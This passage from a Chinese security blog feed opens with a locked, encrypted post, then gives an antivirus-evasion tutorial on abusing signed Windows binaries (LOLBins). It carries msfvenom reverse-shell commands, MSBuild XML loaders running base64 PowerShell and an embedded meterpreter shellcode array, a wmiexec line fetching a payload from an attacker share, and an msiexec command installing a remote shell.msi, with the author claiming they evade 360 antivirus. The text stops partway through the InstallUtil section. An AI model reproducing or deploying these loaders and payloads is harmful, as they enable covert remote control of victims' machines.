  <script id="hbeData" type="hbeData" data-hmacdigest="de100008ac40eaf85b2cd84b862adb59155320c5e36e3027875843b12cafae62">f7484acc807c7848ff11624776b7b8c8dd9e223f0ad30f7187b0ca8e048a24af92079db3357b4a12bb51726ca082e5dc27cdd5dd1ac6c615f8165a1afe4f7d6769718c8da278dde2503670f0772da9a630affe1bdc26ed0e4a7b023b06cc99f2404cd61e53d2f1bca8773d736040e0de552b8614c86213c8b926b42b1bc8288ed2fa447875c76a104fc795ec43c432b1c8513c047543ad77318b1880860c530ecb6eed5066e29f80947b8e2c1cef83a8c911fdf5b34eb4febb87636134e371147af42bdcbc88ecfb0922ab3df47839d5a79b76d35f35135b22edb1a5418897c496a7d1e76fca5060ca82a3e354be1faa1f7d8f9be590ffc1ee05a26bc735aea572d7ea094e8bebfe37170aef2a207275528509f215c5911d1de6b8385a914e47221504a1dc377c67192d95ef6144a011da48abc4e11c85d978a63424891d48bec4d72b9f8cf7ef1bf5cdef94660c24bacaf3a07114a858222ecec2ba71aff0a8349d0a55ec824cb8d7164b5220307e6c6c8c47992307ae57c48d3c32ab412ad486a24db8e7552a6cbc66c8873dd23d830310d4b3c5cbd0370c151dfdf087f5988fb2d86fa87055ede8445bddcb6bb3ac83d4bac1365c6bc96aff538ab228926314e67597eb7a5aa72dbcee22f4c7beb0f0f573629e94d342cb8ef353287763ec774d714faeba76c9a06b42ee805347d440137de153bf6d3f9c15497cd6666c054cebff8a82ba5a4130a461d2971cb7ddca1d5ac5f9e656e9a17c20359500c7cf942ecc588fc716f254875480ad5a2ed5cd5740dd3e28b823561452b286b49dc958a881dca6782b1bccce4c010f27dabe280a2e1f85c7ae3e68d0ae62638669b011ce4a2e76bd428b1c0af32cef0f6a889ec0f14d10c7670f7c912cb94d12ce1600951156906e7b87ca46c622a80df1aedd96208e06b6697ec5d2a4c9181d6eeed5ca631052eee34b8f096b751d0fcd110cecec74471f338eba2de3cf600daef209232ff29aa580c6bc6fcce9ce07c9b8726cc15c2d40433e3720aa2483e86aa0a0655fe9077bcbc5325114d8d415412c080b0844ca445d2571173e918f8ce0984e45644b8642ee756560bd2bf84cfea339d78b864d5794100f5e385de45739d0c1fd000aaab831c8a97754270596fbea13085eac3fa093870a4c32f75439d2f1ecf0151bc5b579cbcd4ec5d84d3d7ec6d21a27b589d5f8fe617b1a996ae57c297e809032cd69e6ccc47db30cee762f078a2b84a7accc03e8ea91a2647cf89eabdae25281634a3e0ed3176387896fd59064df6dec98adf233eff6c914a811127aa3a747256c2a12225773826311f6e43934558f05ec95dd115fefed19936c7a4224bb03002e4de8ce967574082c47cba5198e5687bf183ea06aae91bf69f1eaf7cfb51ebb549309705b560ca8a1e83004541828b68ff8b7e302d93ab39543513a16e886ecd4bdfc00d5487766ec5a2fac857e639f749d78e0386a0aa6615eb0e31fb67cc29afcacfc66a3a4516522088a609b3e3b8ab5d1efd9c59ba54305cc08b5ff01bb8d6c314c1b7f466135ba3786d5d23cf6e0080dee8dba538263b239b6c0ad2b4730a41d9493d76d99c16b14dd5a57911dc42cb01bfc9cf275e9940109c4acdf951127c784c2faca9460d2ae3f7c3d63a1fc48cf3343a01f74e70d2f7e4897dcf70846c7873cbdd08ffbed14940ec1e5d510ef23b30944aac4d62797e155508b42b77ea1327ca2d8b60e4aecfe0496c2c20cf5c746e696e3af1fdf3b4db49a9d72af891909500f92f71f5362163f8edd62ed27bc9e7305438c9e78426c2dfd3380b001b9ff86b77de89caba111f7062b2f479dc3687ac17cc0c35fa73ee5ba9981b5193b950d5d41e0e3e888d2fa26a8d950f4d85f308bf21640dc5189e378ceae7d8b46ff19590e58faef4d57f75d151766ef629b3e3f2d7c1b84c81d9f5014d18f85a291b499fd9827921ed2196b32297f5ed4107834279ddf4f854894868f40401a87f3f1ea24aea1a5f552758c15eb6af870cfa18951fc1ed782c97b50552536bf93ff3b4bdc91057df477282cb410dbbb9ca342276c8eb36857637cc7ce4867c0f32ac17ffa57a1fcc846d0d22bcb16b1dca4dd996e7dc512666e858a00a0c89642e23a4a0a349e3f09780ce03532f4a35ae3ddb77f01ed09dde15ef9e692211b421a2d2caee98ad926ea15a805987999b77486b9f25ce9444c0506251d301ef067b4609dabbf911d6cff9bdbf85f328fefeda40ea4ed163d0e82a28bee8f523cc899eb1d8c9c636ba3da8f9e620c6fc334102c10eb620f6ca927903ee4c78d639565e49a6d30bc412af2edf86a3a3aeedb9f96aea5c73cc3c08f6c63ae57811b8640a5ab6035e42e076b3746f7323b14eb60272875f889d111452a2e32ed0dfc295c961ef2d140d99fedbac498057e9aa972658938012c47a265df8044706a7125ad1557c3f8b88848d1083e442c81eb65934285aa3284b674327b773cb4e3e2cb106f534c7af0cdb1340d7b3fa4dd1a9b18efde0944457e61e967ac55986f09b6ea8e5e1fe2a3f0a8bea86717480642bd1c7fbbee4da3018e2a7479a442d4bbff1554d6787b8eb0e189a190c0ccbca433f14be240eab08a3227f680d5b6ce71aa04634a8a49df8ca10d8991fee6aca4a5d8db2e8fce71e06519aa3356d70801d64e54d7f1a922fc228ec78bf961378501bf30cc64f8da95ab82eb055f46ee934254d233e97720e938e39116fe27f045427bb61d1332df6bd282145a750eb11ca7d26460c12d9d33fd5d4c5ea0d1f30dd47be930475c8eb8fd9c54cc445b4a16e40d18544b40817d7061434f078cdb82dbaa5955e0b9a14b2cfbec006875dc21ea605eaf00c205378384d8301083107ab6f162e0fce6d19d7f8fd7b612c054014f250dfa18ca7f1cc44975f9d41d1f8239b65da0bb78f51782da82e0461f50f18d97e2366baa6cd63dc3639b9c2d133b92b664219ab4ef69b8082d573f502e3679bfe97190ff255ef3c1ca44073d5ba7d2eb22adcc388616c188d62f1f03ddf893d41b8c55dc88e3aa6c0c2d4451ac0664606d35c246f1d5930a67449c52acd8e7e9066748f645a55dd2968f51c715b791d76b8382ee810ff6569991e49c95fa681b453116ad6fd1bbb7c167eca7d76fe5c69c3b57d754f2182b0e646cb9fe9172c1cdf5e15def82281d0a3209608bca5713e25fc72271b4a165797e196b62587b69598a8d6b89f149438e80fc245bf857cfdc9f995a6ae76aeace3d04de2536f7d40e87cac1c48f0acd56d25dc5a40a2d3331ff819d575b954e07833818f1b3b6e8f9b2ad4c1e22205aa4277256751a3129839a136556359cd921edfc6b6588acef8caa33a3d6b68ae10cdef1517f3a82bd318ad6a4df61e66cb1f2cbb31ea600eaacf91bde178e757527bb342ddb503a117a3505a3111f4631c754bc89ae151ede7d74f2a19fc8bcfb1619f118aeb5318b0a20d9ffc2deb03f9bf97b56729833293a6e96e3245337baf48fdb63a9b42b6a67a729314e689cd31ffd65550a22ee567cbfb2e11a103913277ef093d44e5ebcf5706f73e926f2750d5fe1231708f39107a33adaf2397b126f345a3579d5a7c570c9b010153cc7e77fb853ee693c08e696db1f7fb5db9e8f2642f9b7afad05fc8a49ce8a23d13bd2e50704b74dad5f188e01c1e1352cc6743ac27a098cc286446a5bd6bb9eeaea3b75c81e39af387ed37e5b479da1ce01846b93f678726b41982cb720b68084bd43f0f134100ec8f7f232c2651075a2d0bf10fd0e7101ba0e60762bc7877c966db7dbe8a32f87f7576287f793bcd370ae4f52be5b9afcd8f5758dc4602d57c01fa2349fe02a00ca757e30e57a0b825701e9057a487dc90069eeef08d74b3b5e2b1240da5c1264b6f413116a13ac04fb340792e6488d88a7c48f25b19f7665dccbe513b33cf661de6557ecc23cb8e6f96c60018a374b5e4ab1b66faef0c894d5774ce75736bd87a8748590df4728b4513cfb55759a9785948f2421ef08f795957b81ec1290c8771e2a8acb90a0412e2aaed77cc93e349670ac5a9109bb555eb2ec14b9544e86ed6dfd2af0237245e569d17c05207855702a3d299eb85621aa352e744bfd3b13ccea0c9028b1f6b5a2c93b9cbd46d7b3cb71371cc5a9a94739afabe565e7c15c336c20b00f0e719894dd7017d3f8f19a88cc9e04681157b4e13c4cbf21d28e4879e4ea4a9e4767030c54f683bd7dd6f1bfd778ca2582db3aaa8ce18379ec5e26412099497b6e4e767ca32b7cb519bebd59fda5fe9c8caba9f332a01ac4c342ba360e31574f95fb9638a2bad66bac8c54ad9f0fa08378cee24384c3ec6653f8b0301af1b86d8bd9ab032448aaa174e969e626b68d6d86ca994aee774f796748b7ba798023fe528a5ae803e136ad80fe07f3dde03e60c28fa8c1aa25bb1f26f33962a9a325e0409da6048ce5e5fdc799d3220d1576d51cdb0245f9cd05f9ed11421e887a11aa822b59d8ecd677c4bf2dc08623c4540aecf5392283ae5e89d85326da48974df10eef5c78569c4dcdc6e0d1e4f988853c4bbb14d786b326a122e5f3dc3f1932b3c8fdd58e121b50be0d1f04ca7b123e54cc883ecbf6f78d8af61815745e11261636fe65402f44bfdb62277d80da1f046632c7b6823d08323d4371b5b753d2adda24999cc4995ab0365da46dfc04ff4ccca31091ed294429553ea51c88630c7d465b97e944a141d44fd24aacdf41aaa44bc6446cc56a44c92dbccf03fd354294f1f3d4a7c27f41bf0ee17129b2ee94c24228d48c8f7aca0d48bf6cffdb4d99b16936ee9bb5b9cd5aa4b732658fee54d57f4d101a3770da148127117ef93f8a613df9fa66a5acd2940d67910efd162416a4cbb33c183f05919d42d931f0cfc3d4d5dcb66b44ca03ac76dbc88ba685b82ee3737d23a6cefe48b05a7e9b50f15f94876df2a008ad0a9c36ed8b80a02c77213c691f416512e6ff97de904cb6b022cb0578102a79b20f39b57e0b3a79eb8e62fb851db1b55ca0b2110dfba41ef0610868b099c187c071de722c96914a91c604ed8768adffc24f248fe6be07602060263965815eea3240783e29e55414d784510e7a8e54e438494d573ef2bf006bf7e9a6ce056616e7a41abcd1fcfdd716d75a99b93eeedfcd2217f1afb9b20c569856fd0508b43bea54b451637c3aba115188f4fef7c23f89b44c8bca98a4915f00122b3faa8e80c20fd8886d2a526c8d18823b5a719a7a2208cb140eb0067f4606462336ca45701389c4a399212c18eb3c4a219aa9e844b00ad7c70470c525a4ef5564793a8d2395f884973b623c9c627caac631af895aed35720a551b04ef8b8713c31cc1736bdea8fb0819019032a95f15b09e61edbe79d817598dc4aec5ce626b3c052e7bf4693b3c44562731b1c41a580a02a0e5dedda179ac15b2e485ad58559a9293c952dea4ef6b8bf18bd44d2c3d474a6d2030cf8f5c7eaf6c259fff757209499f4e556932e505485978e7affaf4f51078874148825b5801ff57bbb9004a90529c48b64ed9ac42b5aecb209bab4aa1bf620ef9937b95d9b1dcbae18c857cedfccff9c6bdf5a2a2c2245fd9ca187e388cad9cd5a616863858d9fda85f52e6dea95b4fbece7875ce33c3fb8b72b36939a29f47d1ea7c9125a570352af80e33e80f2ca28b20eae127673ab20363a43148861c5cdf028b24ab9ce0cdfc24250a522bb6e66d94c4bd1a8d682ea5265693a179a392ebf99854713e83536d2b0507a697f1febb6c59e461b2667ae81662f42518837f868777bedd4309f2b0b273fa0af9714b7422598f73054bc661c727d04a3e21c2bba7cbf2605935b6a18798cddf059fa55d6ae697f2d64094cf60f2392ebf8f14b9e3b24147f26030f56313ae79a8e2989a9af02ac8be35abb91a4abe9847518bd2fd33e4</script>
  <div class="hbe hbe-content">
    <div class="hbe hbe-input hbe-input-default">
      <input class="hbe hbe-input-field hbe-input-field-default" type="password" id="hbePass">
      <label class="hbe hbe-input-label hbe-input-label-default" for="hbePass">
        <span class="hbe hbe-input-label-content hbe-input-label-content-default">Only TeamGipsy members can view</span>
      </label>
    </div>
  </div>
</div>
<script data-pjax src="/lib/hbe.js"></script><link href="/css/hbe.style.css" rel="stylesheet" type="text/css">]]></content>
      <tags>
        <tag>面经</tag>
      </tags>
  </entry>
  <entry>
    <title>远控免杀——白名单篇</title>
    <url>/2022/02/23/%E8%BF%9C%E6%8E%A7%E5%85%8D%E6%9D%80%E2%80%94%E2%80%94%E7%99%BD%E5%90%8D%E5%8D%95%E7%AF%87/</url>
    <content><![CDATA[<h1 id="远控免杀——白名单篇"><a href="#远控免杀——白名单篇" class="headerlink" title="远控免杀——白名单篇"></a>远控免杀——白名单篇</h1><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>白名单程序，白就是此文件在杀软的白名单中，不会被杀软查杀</p>
<p>黑就是恶意代码</p>
<p>通过白+黑的方式组成木马等，来达到免杀的目的</p>
<span id="more"></span>

<p>白名单程序的利用起源于LOLBins，全称<code>Living off the land Binaries</code>。Lolbins为二进制文件，攻击方可以通过该二进制文件执行超出其本身功能的工作</p>
<h3 id="LOLBins定义"><a href="#LOLBins定义" class="headerlink" title="LOLBins定义"></a>LOLBins定义</h3><ol>
<li><p>它是操作系统本身文件，或者是从Microsoft下载的文件。总之它必须带有windows自身签名文件。</p>
</li>
<li><p>由于是windows自身签名文件，所以一般天然带有免杀的属性,能通过很多应用程序的白名单。</p>
</li>
<li><p>它具有APT功能或者一些对红队有用的功能。比如2019年TA505利用LoLbin和新型后门攻击金融行业。</p>
</li>
</ol>
<h3 id="LOLBins功能"><a href="#LOLBins功能" class="headerlink" title="LOLBins功能"></a>LOLBins功能</h3><ol>
<li><p>执行代码：任意代码执行，通过LOLbins执行其他程序（未带微软签名）或者脚本。</p>
</li>
<li><p>代码编译</p>
</li>
<li><p>文件操作。下载；上传；复制</p>
</li>
<li><p>持久性权限维持。利用现有的LOLBins来做权限维持；持久性（比如通过隐藏数据在AD中，在登录时候启动。）</p>
</li>
<li><p>UAC Bypass</p>
</li>
<li><p>转储进程内存</p>
</li>
<li><p>监控（例如键盘记录器，网络跟踪等等）</p>
</li>
<li><p>逃避/修改日志</p>
</li>
<li><p>不需要重定位到文件系统其他位置的DLLinjected/side-loading。</p>
</li>
</ol>
<h2 id="MSBuild-exe"><a href="#MSBuild-exe" class="headerlink" title="MSBuild.exe"></a>MSBuild.exe</h2><p>在工具篇中用到的nps_payload就是生成<code>.xml</code>，然后利用msbuild.exe来加载payload</p>
<p>适用条件：.NET Framework&gt;=4.0</p>
<h3 id="加载文件方式"><a href="#加载文件方式" class="headerlink" title="加载文件方式"></a>加载文件方式</h3><ol>
<li><p>本地加载执行</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">%windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe &lt;folder_path_here&gt;\msbuild_nps.xml</span><br></pre></td></tr></table></figure></li>
<li><p>远程文件执行</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">wmiexec.py &lt;USER&gt;:&#x27;&lt;PASS&gt;&#x27;@&lt;RHOST&gt; cmd.exe /c start %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\&lt;attackerip&gt;\&lt;share&gt;\msbuild_nps.xml</span><br></pre></td></tr></table></figure></li>
</ol>
<h3 id="利用一"><a href="#利用一" class="headerlink" title="利用一"></a>利用一</h3><p>msfvenom生成powershell shellcode</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.221.128 lport=4444 -f psh -o shell.ps1</span><br></pre></td></tr></table></figure>

<p>在ps1脚本末尾添加<code>for (;;)&#123;\n  Start-sleep 60\n&#125;</code></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220222152728446.png" alt="image-20220222152728446"></p>
<p>用base64编码后放入<code>shell.xml</code>中<code>cmd</code>处</p>
<figure class="highlight xml"><table><tr><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">Project</span> <span class="attr">ToolsVersion</span>=<span class="string">&quot;4.0&quot;</span></span></span><br><span class="line"><span class="tag"><span class="attr">xmlns</span>=<span class="string">&quot;http://schemas.microsoft.com/developer/msbuild/2003&quot;</span>&gt;</span></span><br><span class="line"> <span class="comment">&lt;!-- This inline task executes c# code. --&gt;</span></span><br><span class="line"> <span class="comment">&lt;!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe</span></span><br><span class="line"><span class="comment">nps.xml --&gt;</span></span><br><span class="line"> <span class="comment">&lt;!-- Original MSBuild Author: Casey Smith, Twitter: @subTee --&gt;</span></span><br><span class="line"> <span class="comment">&lt;!-- NPS Created By: Ben Ten, Twitter: @ben0xa --&gt;</span></span><br><span class="line"> <span class="comment">&lt;!-- License: BSD 3-Clause --&gt;</span></span><br><span class="line"> <span class="tag">&lt;<span class="name">Target</span> <span class="attr">Name</span>=<span class="string">&quot;npscsharp&quot;</span>&gt;</span></span><br><span class="line"> <span class="tag">&lt;<span class="name">nps</span> /&gt;</span></span><br><span class="line"> <span class="tag">&lt;/<span class="name">Target</span>&gt;</span></span><br><span class="line"> <span class="tag">&lt;<span class="name">UsingTask</span></span></span><br><span class="line"><span class="tag"> <span class="attr">TaskName</span>=<span class="string">&quot;nps&quot;</span></span></span><br><span class="line"><span class="tag"> <span class="attr">TaskFactory</span>=<span class="string">&quot;CodeTaskFactory&quot;</span></span></span><br><span class="line"><span class="tag"> </span></span><br><span class="line"><span class="tag"><span class="attr">AssemblyFile</span>=<span class="string">&quot;C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microso</span></span></span><br><span class="line"><span class="string"><span class="tag">ft.Build.Tasks.v4.0.dll&quot;</span> &gt;</span></span><br><span class="line"> <span class="tag">&lt;<span class="name">Task</span>&gt;</span></span><br><span class="line"> <span class="tag">&lt;<span class="name">Reference</span> <span class="attr">Include</span>=<span class="string">&quot;System.Management.Automation&quot;</span> /&gt;</span></span><br><span class="line"> <span class="tag">&lt;<span class="name">Code</span> <span class="attr">Type</span>=<span class="string">&quot;Class&quot;</span> <span class="attr">Language</span>=<span class="string">&quot;cs&quot;</span>&gt;</span></span><br><span class="line"> &lt;![CDATA[</span><br><span class="line"> using System;</span><br><span class="line"> using System.Collections.ObjectModel;</span><br><span class="line"> using System.Management.Automation;</span><br><span class="line"> using System.Management.Automation.Runspaces;</span><br><span class="line"> using Microsoft.Build.Framework;</span><br><span class="line"> using Microsoft.Build.Utilities;</span><br><span class="line"> public class nps : Task, ITask</span><br><span class="line"> &#123;</span><br><span class="line"> public override bool Execute()</span><br><span class="line"> &#123;</span><br><span class="line"> string cmd = &quot;JEFuRUl---base64_shellcode-----</span><br><span class="line">xsSW1wb3J0KCJrZXJuZWwzMi5k&quot;;</span><br><span class="line"> PowerShell ps = PowerShell.Create();</span><br><span class="line"> ps.AddScript(Base64Decode(cmd));</span><br><span class="line"> Collection&lt;PSObject&gt; output = null;</span><br><span class="line"> try</span><br><span class="line"> &#123;</span><br><span class="line"> output = ps.Invoke();</span><br><span class="line"> &#125;</span><br><span class="line"> catch(Exception e)</span><br><span class="line"> &#123;</span><br><span class="line"> Console.WriteLine(&quot;Error while executing the</span><br><span class="line">script.\r\n&quot; + e.Message.ToString());</span><br><span class="line"> &#125;</span><br><span class="line"> if (output != null)</span><br><span class="line"> &#123;</span><br><span class="line"> foreach (PSObject rtnItem in output)</span><br><span class="line"> &#123;</span><br><span class="line"> Console.WriteLine(rtnItem.ToString());</span><br><span class="line"> &#125;</span><br><span class="line"> &#125;</span><br><span class="line"> return true;</span><br><span class="line"> &#125;</span><br><span class="line"> public static string Base64Encode(string text) &#123;</span><br><span class="line"> return</span><br><span class="line">System.Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(te</span><br><span class="line">xt));</span><br><span class="line"> &#125;</span><br><span class="line"> public static string Base64Decode(string encodedtext) &#123;</span><br><span class="line"> return</span><br><span class="line">System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String</span><br><span class="line">(encodedtext));</span><br><span class="line"> &#125;</span><br><span class="line"> &#125;</span><br><span class="line"> ]]&gt;</span><br><span class="line"> <span class="tag">&lt;/<span class="name">Code</span>&gt;</span></span><br><span class="line"> <span class="tag">&lt;/<span class="name">Task</span>&gt;</span></span><br><span class="line"> <span class="tag">&lt;/<span class="name">UsingTask</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">Project</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>脚本执行有点问题，<code>shell.xml</code>能过360静态查杀</p>
<h3 id="利用二"><a href="#利用二" class="headerlink" title="利用二"></a>利用二</h3><p>msfvenom生成C# shellcode</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.221.128 lport=4444 -f csharp</span><br></pre></td></tr></table></figure>

<p>shellcode.xml</p>
<figure class="highlight xml"><table><tr><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">Project</span> <span class="attr">ToolsVersion</span>=<span class="string">&quot;4.0&quot;</span> <span class="attr">xmlns</span>=<span class="string">&quot;http://schemas.microsoft.com/developer/msbuild/2003&quot;</span>&gt;</span></span><br><span class="line">  <span class="comment">&lt;!-- This inline task executes shellcode. --&gt;</span></span><br><span class="line">  <span class="comment">&lt;!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj --&gt;</span></span><br><span class="line">  <span class="comment">&lt;!-- Save This File And Execute The Above Command --&gt;</span></span><br><span class="line">  <span class="comment">&lt;!-- Author: Casey Smith, Twitter: @subTee --&gt;</span> </span><br><span class="line">  <span class="comment">&lt;!-- License: BSD 3-Clause --&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">Target</span> <span class="attr">Name</span>=<span class="string">&quot;Hello&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">ClassExample</span> /&gt;</span></span><br><span class="line">  <span class="tag">&lt;/<span class="name">Target</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">UsingTask</span></span></span><br><span class="line"><span class="tag">    <span class="attr">TaskName</span>=<span class="string">&quot;ClassExample&quot;</span></span></span><br><span class="line"><span class="tag">    <span class="attr">TaskFactory</span>=<span class="string">&quot;CodeTaskFactory&quot;</span></span></span><br><span class="line"><span class="tag">    <span class="attr">AssemblyFile</span>=<span class="string">&quot;C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll&quot;</span> &gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">Task</span>&gt;</span></span><br><span class="line">    </span><br><span class="line">      <span class="tag">&lt;<span class="name">Code</span> <span class="attr">Type</span>=<span class="string">&quot;Class&quot;</span> <span class="attr">Language</span>=<span class="string">&quot;cs&quot;</span>&gt;</span></span><br><span class="line">      &lt;![CDATA[</span><br><span class="line">        using System;</span><br><span class="line">        using System.Runtime.InteropServices;</span><br><span class="line">        using Microsoft.Build.Framework;</span><br><span class="line">        using Microsoft.Build.Utilities;</span><br><span class="line">        public class ClassExample :  Task, ITask</span><br><span class="line">        &#123;         </span><br><span class="line">          private static UInt32 MEM_COMMIT = 0x1000;          </span><br><span class="line">          private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;          </span><br><span class="line">          [DllImport(&quot;kernel32&quot;)]</span><br><span class="line">            private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,</span><br><span class="line">            UInt32 size, UInt32 flAllocationType, UInt32 flProtect);          </span><br><span class="line">          [DllImport(&quot;kernel32&quot;)]</span><br><span class="line">            private static extern IntPtr CreateThread(            </span><br><span class="line">            UInt32 lpThreadAttributes,</span><br><span class="line">            UInt32 dwStackSize,</span><br><span class="line">            UInt32 lpStartAddress,</span><br><span class="line">            IntPtr param,</span><br><span class="line">            UInt32 dwCreationFlags,</span><br><span class="line">            ref UInt32 lpThreadId           </span><br><span class="line">            );</span><br><span class="line">          [DllImport(&quot;kernel32&quot;)]</span><br><span class="line">            private static extern UInt32 WaitForSingleObject(           </span><br><span class="line">            IntPtr hHandle,</span><br><span class="line">            UInt32 dwMilliseconds</span><br><span class="line">            );          </span><br><span class="line">          public override bool Execute()</span><br><span class="line">          &#123;</span><br><span class="line">            byte[] shellcode = new byte[354] &#123;</span><br><span class="line">0xfc,0xe8,0x8f,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,</span><br><span class="line">0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x31,0xff,0x0f,0xb7,0x4a,0x26,</span><br><span class="line">0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0x49,</span><br><span class="line">0x75,0xef,0x52,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,</span><br><span class="line">0xc0,0x57,0x74,0x4c,0x01,0xd0,0x8b,0x58,0x20,0x01,0xd3,0x8b,0x48,0x18,0x50,</span><br><span class="line">0x85,0xc9,0x74,0x3c,0x31,0xff,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xc0,0xc1,</span><br><span class="line">0xcf,0x0d,0xac,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,</span><br><span class="line">0x75,0xe0,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,</span><br><span class="line">0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,</span><br><span class="line">0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xe9,0x80,0xff,0xff,0xff,0x5d,</span><br><span class="line">0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,</span><br><span class="line">0x07,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,</span><br><span class="line">0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,0x68,0xc0,0xa8,0xdd,0x80,0x68,0x02,</span><br><span class="line">0x00,0x11,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,</span><br><span class="line">0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,</span><br><span class="line">0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x67,0x00,0x00,</span><br><span class="line">0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,</span><br><span class="line">0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,</span><br><span class="line">0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,</span><br><span class="line">0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x68,0x00,</span><br><span class="line">0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,</span><br><span class="line">0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0x0f,0x85,0x70,0xff,</span><br><span class="line">0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb,</span><br><span class="line">0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5 &#125;;</span><br><span class="line">              </span><br><span class="line">              UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,</span><br><span class="line">                MEM_COMMIT, PAGE_EXECUTE_READWRITE);</span><br><span class="line">              Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);</span><br><span class="line">              IntPtr hThread = IntPtr.Zero;</span><br><span class="line">              UInt32 threadId = 0;</span><br><span class="line">              IntPtr pinfo = IntPtr.Zero;</span><br><span class="line">              hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);</span><br><span class="line">              WaitForSingleObject(hThread, 0xFFFFFFFF);</span><br><span class="line">              return true;</span><br><span class="line">          &#125; </span><br><span class="line">        &#125;     </span><br><span class="line">      ]]&gt;</span><br><span class="line">      <span class="tag">&lt;/<span class="name">Code</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">Task</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;/<span class="name">UsingTask</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">Project</span>&gt;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220222162020816.png" alt="image-20220222162020816"></p>
<p>msf上线</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220222161956622.png" alt="image-20220222161956622"></p>
<p>360动静态未查杀</p>
<h2 id="misexec-exe"><a href="#misexec-exe" class="headerlink" title="misexec.exe"></a>misexec.exe</h2><p>当Windows操作系统安装了Windows Installer引擎，⽽MSI软件包使⽤该引擎来 安装应⽤程序，解释包和安装产品的可执⾏程序</p>
<h3 id="使用方式"><a href="#使用方式" class="headerlink" title="使用方式"></a>使用方式</h3><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">msiexec /q /i http://ip/shell.msi</span><br></pre></td></tr></table></figure>

<p>经测试msf自生成以及一些工具生成的msi文件免杀效果都一般</p>
<h2 id="InstallUtil-exe"><a href="#InstallUtil-exe" class="headerlink" title="InstallUtil.exe"></a>InstallUtil.exe</h2><p>InstallUtil.exe可以⽤于安装由.NET开发的所有应⽤安装程序</p>
<h3 id="CSC-InstallUtil执行shellcode"><a href="#CSC-InstallUtil执行shellcode" class="headerlink" title="CSC+InstallUtil执行shellcode"></a>CSC+InstallUtil执行shellcode</h3><p>msfvenom生成C# shellcode 编码一下</p>
